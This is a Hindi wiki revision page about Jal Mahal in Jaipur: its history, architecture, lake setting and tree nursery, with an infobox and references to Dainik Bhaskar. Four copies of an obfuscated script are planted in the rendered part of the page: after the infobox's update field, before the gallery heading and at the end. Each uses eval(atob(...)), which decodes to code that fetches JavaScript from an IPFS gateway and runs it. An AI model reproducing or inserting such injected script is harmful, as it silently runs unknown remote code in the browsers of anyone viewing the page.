Difference between revisions of "जल महल जयपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('जयपुर आमेर मार्ग पर मानसागर झील के मध्‍य स्थित इस...' के साथ नया पन्ना बनाया)
 
 
(34 intermediate revisions by 12 users not shown)
Line 1: Line 1:
[[जयपुर]] आमेर मार्ग पर [[मानसागर झील]] के मध्‍य स्थित इस महल का निर्माण [[सवाई जयसिंह]] ने अश्‍वमेघ यज्ञ के बाद अपनी रानियों और पंडित साथ अवभ्रत स्‍नान के लिए करवाया था। इससे पूर्व जयसिंह ने [[जयपुर]] की जलापूर्ति हेतु [[गर्भावती नदी]] पर बांध बनवाकर मानसागर झील का निर्माण करवाया। जलमहल मध्‍यकालीन महलों की तरह मेहराबों, बुर्जो, छतरियों एवं सीढीदार जीनों से युक्‍त दुमंजिला और वर्गाकार रूप में निर्मित भवन है। इसकी उपरी मंजिल की चारों कोनों पर बुर्जो की छतरीयां व बीच की बरादरिया, संगमरमर के स्‍तम्‍भों पर आधारित हैं। जलमहल अब पक्षी अभ्‍यारण के रूप में भी विकसित हो रहा है जलमहल में आने वाले सीवरेज के पानी की दुर्गध की समस्‍या का समाधान करने के लिए राज्‍य सरकार द्वारा एक बडी परियोजना बनायी गयी है।
+
{{सूचना बक्सा पर्यटन
 +
|चित्र=Jal-Mahal-Jaipur.jpg
 +
|चित्र का नाम=जल महल, जयपुर
 +
|विवरण=जलमहल मध्‍यकालीन महलों की तरह मेहराबों, बुर्जो, छतरियों एवं सीढीदार जीनों से युक्‍त दुमंजिला और वर्गाकार रूप में निर्मित भवन है।
 +
|राज्य=[[राजस्थान]]
 +
|केन्द्र शासित प्रदेश=
 +
|ज़िला=[[जयपुर ज़िला]]
 +
|निर्माता=[[जयसिंह|सवाई जयसिंह]]
 +
|स्वामित्व=
 +
|प्रबंधक=
 +
|निर्माण काल=
 +
|स्थापना=18वीं सदी
 +
|भौगोलिक स्थिति=[http://maps.google.com/maps?q=26.9537,75.8463&hl=en&ll=26.953672,75.846262&spn=0.032975,0.084543&sll=26.957344,75.846262&sspn=0.032974,0.084543&vpsrc=0&t=m&z=14 उत्तर- 26.9537°, पूर्व- 75.8463°]
 +
|मार्ग स्थिति=जल महल राष्ट्रीय राजमार्ग संख्या-8 [[जयपुर]] से 8 किमी की दूरी पर स्थित है।
 +
|मौसम=
 +
|तापमान=
 +
|प्रसिद्धि=
 +
|कब जाएँ=
 +
|कैसे पहुँचें=हवाई जहाज़, रेल, बस आदि
 +
|हवाई अड्डा=जयपुर अंतर्राष्ट्रीय हवाई अड्डा
 +
|रेलवे स्टेशन=जयपुर जंक्शन
 +
|बस अड्डा=सिन्धी कैम्प, घाट गेट
 +
|यातायात=बस, रिक्शा, टैक्सी आदि
 +
|क्या देखें=
 +
|कहाँ ठहरें=होटल, धर्मशाला, अतिथि ग्रह
 +
|क्या खायें=
 +
|क्या ख़रीदें=
 +
|एस.टी.डी. कोड=0141
 +
|ए.टी.एम=लगभग सभी
 +
|सावधानी=
 +
|मानचित्र लिंक=[http://maps.google.com/maps?saddr=Jaipur,+Rajasthan,+India&daddr=jal+mahal&hl=en&ll=26.939211,75.831585&spn=0.065958,0.169086&sll=26.937375,75.831585&sspn=0.065959,0.169086&geocode=FYi4mgEdKOCEBCmB4ldM30psOTEJLvIMOsbhDA%3BFZZGmwEdylGFBCE2rw1H8MMxAg&vpsrc=0&mra=ls&t=m&z=13 गूगल मानचित्र]
 +
|संबंधित लेख=[[सिटी पैलेस जयपुर|सिटी पैलेस]], [[आमेर का क़िला जयपुर|आमेर का क़िला]], [[हवा महल जयपुर|हवा महल]], [[सांभर झील जयपुर|सांभर झील]], [[अम्बर क़िला जयपुर|अम्बर क़िला]]
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=इसकी उपरी मंज़िल की चारों कोनों पर बुर्जो की छतरियाँ व बीच की बरादरिया, संगमरमर के स्‍तम्‍भों पर आधारित हैं। जलमहल अब पक्षी अभ्‍यारण के रूप में भी विकसित हो रहा है।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन={{अद्यतन|17:43, 15 फ़रवरी 2012 (IST)}}
 +
}}
 +
'''जलमहल''' [[जयपुर]] के मानसागर झील के मध्‍य स्थित [[अरावली पर्वतमाला|अरावली पहाडिय़ों]] के गर्भ में बसा सैलानियों के लिए आकर्षण का केंद्र है। झील के बीचों बीच होने से इसे 'आई बॉल' भी कहा जाता है। वैसे इसे 'रोमांटिक महल' के नाम से जाना जाता था। अभी जहाँ झील है, वहाँ कभी डाउन स्ट्रीम क्षेत्र हुआ करता था।
 +
==निर्माण==
 +
1596 ई. में गंभीर अकाल पडने पर तत्कालीन [[अजमेर]] के शासक ने पानी की कमी को दूर करने के लिए बांध का निर्माण करवाया था। ताकि पानी को जमा किया जा सके। बाँध को बाद में 17वीं सदी में एक पत्थर की चिनाई संरचना में परिवर्तित किया था। यूं तो जल महल का निर्माण 1799 में हुआ था। इसके निर्माण के लिए राजपूत शैली से तैयार की गई नौकाओं की मदद ली गई थी। लेकिन इस महल का जीर्णोद्धार [[जयसिंह|महाराजा जयसिंह]] ने करवाया था। यहाँ के राजा इस महल को अपने रानी के साथ ख़ास वक्‍त बिताने के लिए इस्‍तेमाल करते थे। चांदनी रात में इस महल का ख़ूबसूरत नज़ारा झील के पानी में देखा जा सकता है। यूं तो राजा इसका इस्‍तेमाल रॉयल पार्टी देने के लिए भी करते थे, लेकिन यह कभी जयपुर स्टेट के राजा का घर भी हुआ करता था।<ref>{{cite web |url=http://www.bhaskar.com/article/c-10-1330613-2450798.html |title=रोमांटिक महल कहा जाता था जल महल को |accessmonthday=8 नवंबर |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=दैनिक भास्कर |language=हिन्दी }}</ref>
 +
==विशेषता==
 +
*महल की ख़ासियत यह है कि यहाँ गर्मी नहीं लगती, क्‍योंकि इसके कई तल पानी के अंदर बनाए गए हैं। यहाँ से पहाड़ और झील का ख़ूबसूरत नज़ारा भी देखा जा सकता है।
 +
*[[जयपुर]]-[[आमेर]] मार्ग पर मानसागर झील के मध्‍य स्थित इस महल का निर्माण [[जयसिंह|सवाई जयसिंह]] ने [[अश्वमेध यज्ञ]] के बाद अपनी रानियों और पंडित के साथ स्‍नान के लिए करवाया था।  
 +
*इससे पूर्व जयसिंह ने [[जयपुर]] की जलापूर्ति हेतु [[गर्भावती नदी]] पर बांध बनवाकर मानसागर झील का निर्माण करवाया।  
 +
*जलमहल मध्‍यकालीन महलों की तरह मेहराबों, बुर्जो, छतरियों एवं सीढीदार जीनों से युक्‍त दुमंजिला और वर्गाकार रूप में निर्मित भवन है।  
 +
*इसकी उपरी मंज़िल की चारों कोनों पर बुर्जो की छतरियाँ व बीच की बरादरिया, संगमरमर के स्‍तम्‍भों पर आधारित हैं।  
 +
*जलमहल अब पक्षी अभ्‍यारण के रूप में भी विकसित हो रहा है।
  
 +
====नर्सरी में 1 लाख से अधिक वृक्ष====
 +
जल महल के नर्सरी में 1 लाख से ज्‍यादा वृक्ष लगे हुए हैं। ये वृक्ष यहां के वादियों को [[प्रदूषण]] मुक्‍त बनाते हैं। जल महल न सिर्फ आपकी थकान मिटाता है बल्कि यह आपके उम्र में इजाफ़ा भी करता है। यूं तो जल महल का नर्सरी काफ़ी पुराना है लेकिन दिन रात 40 माली पेड़ पौधों की देखभाल में लगे रहते हैं। यहां आप अरावली प्‍लांट, ऑरनामेंटल प्‍लांट, शर्ब, हेज और क्रिपर की हजारों विभिन्नताएँ देख सकते हैं। यहां की नर्सरी की ख़ासियत यह है कि यहां बहुत से पेड़ जो 150 साल पुराने हैं उन्‍हें ट्रांसप्‍लांट कर नया जीवन दिया गया है।<ref name="DB">{{cite web |url=http://www.bhaskar.com/article/LIF-jal-mahal-to-have-largest-tall-plant-nursery-2092669.html |title=रोमांस और प्रकृति का अद्भुत संगम है जलमहल |accessmonthday=8 नवंबर |accessyear=2011 |last= |first= |authorlink= |format=एच.टी.एम.एल |publisher=दैनिक भास्कर |language=हिन्दी }}</ref>
 +
====सबसे उंचे वृक्षों वाला नर्सरी====
 +
जल महल के इस नर्सरी का विकास महल की ख़ूबसूरती को बढ़ाने के लिए किया गया है। यह नर्सरी [[राजस्थान]] का सबसे उंचे पेड़ों वाला नर्सरी है। यहां पेड़ों की संख्‍या 1 लाख से ज्‍यादा है। जल महल रिसोर्ट के सूचना अधिकारी का कहना है कि हर साल यहां डेट पाम, चाइना पाम और बुगनबेलिया जैसे शो प्‍लांट को ट्रांसप्‍लांट किया जाता है।<ref name="DB"/>
 +
 +
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक2 |माध्यमिक= |पूर्णता= |शोध= }}
 +
==वीथिका==
 +
<gallery>
 +
चित्र:Jal-Mahal-1.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal-Mahal.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal-Mahal-3.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal-Mahal-ab.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal Mahal-7.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal Mahal-8.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal Mahal-9.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal Mahal-Jaipur-1.jpg|जल महल, [[जयपुर]]
 +
चित्र:Jal Mahal-2.jpg|जल महल, [[जयपुर]] का रात का दृश्य
 +
</gallery>
 +
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{राजस्थान के पर्यटन स्थल}}
 +
[[Category:जयपुर]]
 
[[Category:जयपुर के पर्यटन स्थल]]
 
[[Category:जयपुर के पर्यटन स्थल]]
[[Category:राजस्थान_के_पर्यटन_स्थल]]
+
[[Category:राजस्थान]][[Category:राजस्थान के पर्यटन स्थल]]
 
[[Category:पर्यटन कोश]]
 
[[Category:पर्यटन कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Latest revision as of 12:27, 18 July 2017

jal mahal jayapur
vivaran jalamahal madhh‍yakalin mahaloan ki tarah meharaboan, burjo, chhatariyoan evan sidhidar jinoan se yukh‍t dumanjila aur vargakar roop mean nirmit bhavan hai.
rajy rajasthan
zila jayapur zila
nirmata savaee jayasianh
sthapana 18vian sadi
bhaugolik sthiti uttar- 26.9537°, poorv- 75.8463°
marg sthiti jal mahal rashtriy rajamarg sankhya-8 jayapur se 8 kimi ki doori par sthit hai.
kaise pahuanchean havaee jahaz, rel, bas adi
havaee adda jayapur aantarrashtriy havaee adda
relave steshan jayapur jankshan
bas adda sindhi kaimp, ghat get
yatayat bas, riksha, taiksi adi
kahaan thaharean hotal, dharmashala, atithi grah
es.ti.di. kod 0141
e.ti.em lagabhag sabhi
chitr:Map-icon.gif googal manachitr
sanbandhit lekh siti pailes, amer ka qila, hava mahal, saanbhar jhil, ambar qila


any janakari isaki upari manzil ki charoan konoan par burjo ki chhatariyaan v bich ki baradariya, sangamaramar ke sh‍tamh‍bhoan par adharit haian. jalamahal ab pakshi abhh‍yaran ke roop mean bhi vikasit ho raha hai.
adyatan‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

jalamahal jayapur ke manasagar jhil ke madhh‍y sthit aravali pahadiy़oan ke garbh mean basa sailaniyoan ke lie akarshan ka keandr hai. jhil ke bichoan bich hone se ise 'aee b aaul' bhi kaha jata hai. vaise ise 'romaantik mahal' ke nam se jana jata tha. abhi jahaan jhil hai, vahaan kabhi daun strim kshetr hua karata tha.

nirman

1596 ee. mean ganbhir akal padane par tatkalin ajamer ke shasak ne pani ki kami ko door karane ke lie baandh ka nirman karavaya tha. taki pani ko jama kiya ja sake. baandh ko bad mean 17vian sadi mean ek patthar ki chinaee sanrachana mean parivartit kiya tha. yooan to jal mahal ka nirman 1799 mean hua tha. isake nirman ke lie rajapoot shaili se taiyar ki gee naukaoan ki madad li gee thi. lekin is mahal ka jirnoddhar maharaja jayasianh ne karavaya tha. yahaan ke raja is mahal ko apane rani ke sath khas vakh‍t bitane ke lie ish‍temal karate the. chaandani rat mean is mahal ka khoobasoorat nazara jhil ke pani mean dekha ja sakata hai. yooan to raja isaka ish‍temal r aauyal parti dene ke lie bhi karate the, lekin yah kabhi jayapur stet ke raja ka ghar bhi hua karata tha.[1]

visheshata

  • mahal ki khasiyat yah hai ki yahaan garmi nahian lagati, kh‍yoanki isake kee tal pani ke aandar banae ge haian. yahaan se paha d aur jhil ka khoobasoorat nazara bhi dekha ja sakata hai.
  • jayapur-amer marg par manasagar jhil ke madhh‍y sthit is mahal ka nirman savaee jayasianh ne ashvamedh yajn ke bad apani raniyoan aur pandit ke sath sh‍nan ke lie karavaya tha.
  • isase poorv jayasianh ne jayapur ki jalapoorti hetu garbhavati nadi par baandh banavakar manasagar jhil ka nirman karavaya.
  • jalamahal madhh‍yakalin mahaloan ki tarah meharaboan, burjo, chhatariyoan evan sidhidar jinoan se yukh‍t dumanjila aur vargakar roop mean nirmit bhavan hai.
  • isaki upari manzil ki charoan konoan par burjo ki chhatariyaan v bich ki baradariya, sangamaramar ke sh‍tamh‍bhoan par adharit haian.
  • jalamahal ab pakshi abhh‍yaran ke roop mean bhi vikasit ho raha hai.

narsari mean 1 lakh se adhik vriksh

jal mahal ke narsari mean 1 lakh se jh‍yada vriksh lage hue haian. ye vriksh yahaan ke vadiyoan ko pradooshan mukh‍t banate haian. jal mahal n sirph apaki thakan mitata hai balki yah apake umr mean ijafa bhi karata hai. yooan to jal mahal ka narsari kafi purana hai lekin din rat 40 mali pe d paudhoan ki dekhabhal mean lage rahate haian. yahaan ap aravali ph‍laant, aauranameantal ph‍laant, sharb, hej aur kripar ki hajaroan vibhinnataean dekh sakate haian. yahaan ki narsari ki khasiyat yah hai ki yahaan bahut se pe d jo 150 sal purane haian unh‍hean traansaph‍laant kar naya jivan diya gaya hai.[2]

sabase uanche vrikshoan vala narsari

jal mahal ke is narsari ka vikas mahal ki khoobasoorati ko badhane ke lie kiya gaya hai. yah narsari rajasthan ka sabase uanche pe doan vala narsari hai. yahaan pe doan ki sankhh‍ya 1 lakh se jh‍yada hai. jal mahal risort ke soochana adhikari ka kahana hai ki har sal yahaan det pam, chaina pam aur buganabeliya jaise sho ph‍laant ko traansaph‍laant kiya jata hai.[2]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

vithika

tika tippani aur sandarbh

  1. romaantik mahal kaha jata tha jal mahal ko (hindi) (ech.ti.em.el) dainik bhaskar. abhigaman tithi: 8 navanbar, 2011.
  2. 2.0 2.1 romaans aur prakriti ka adbhut sangam hai jalamahal (hindi) (ech.ti.em.el) dainik bhaskar. abhigaman tithi: 8 navanbar, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>